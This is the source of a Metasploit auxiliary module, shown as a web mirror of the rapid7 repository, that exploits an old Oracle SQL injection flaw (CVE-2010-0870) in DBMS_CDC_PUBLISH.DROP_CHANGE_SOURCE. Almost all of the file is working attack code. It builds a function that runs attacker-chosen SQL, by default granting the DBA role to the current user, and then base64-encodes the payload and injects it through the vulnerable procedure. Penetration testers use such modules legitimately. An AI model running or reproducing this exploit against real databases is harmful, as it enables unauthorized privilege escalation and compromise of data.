Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE',

14
        'Description' => %q{

15
          The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE

16
          procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege

17
          on the vulnerable package can exploit this vulnerability. By default, users granted

18
          EXECUTE_CATALOG_ROLE have the required privilege.

19
        },

20
        'Author' => [ 'MC' ],

21
        'License' => MSF_LICENSE,

22
        'References' => [

23
          [ 'CVE', '2010-0870' ],

24
          [ 'OSVDB', '63772'],

25
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html' ]

26
        ],

27
        'DisclosureDate' => '2010-04-26',

28
        'Notes' => {

29
          'Stability' => [CRASH_SAFE],

30
          'SideEffects' => [IOC_IN_LOGS],

31
          'Reliability' => []

32
        }

33
      )

34
    )

35


36
    register_options(

37
      [

38
        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),

39
      ]

40
    )

41
  end

42


43
  def run

44
    return if !check_dependencies

45


46
    name = Rex::Text.rand_text_alpha_upper(1..10)

47
    var1 = Rex::Text.rand_text_alpha_upper(1..10)

48
    var2 = Rex::Text.rand_text_alpha_upper(1..10)

49


50
    function = "

51
CREATE OR REPLACE FUNCTION #{name}

52
RETURN VARCHAR2 AUTHID CURRENT_USER

53
IS

54
PRAGMA AUTONOMOUS_TRANSACTION;

55
BEGIN

56
EXECUTE IMMEDIATE '#{datastore['SQL']}';

57
COMMIT;

58
RETURN NULL;

59
END;

60
    "

61


62
    package = "

63
BEGIN

64
SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE('''||'||user||'.#{name}||''');

65
END;

66
    "

67


68
    uno = Rex::Text.encode_base64(function)

69
    dos = Rex::Text.encode_base64(package)

70


71
    encoded_sql = %|

72
DECLARE

73
#{var1} VARCHAR2(32767);

74
#{var2} VARCHAR2(32767);

75
BEGIN

76
#{var1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));

77
EXECUTE IMMEDIATE #{var1};

78
#{var2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));

79
EXECUTE IMMEDIATE #{var2};

80
END;

81
    |

82


83
    print_status('Attempting sql injection on SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE...')

84
    prepare_exec(encoded_sql)

85
    print_status('Done...')

86
  end

87
end

88


89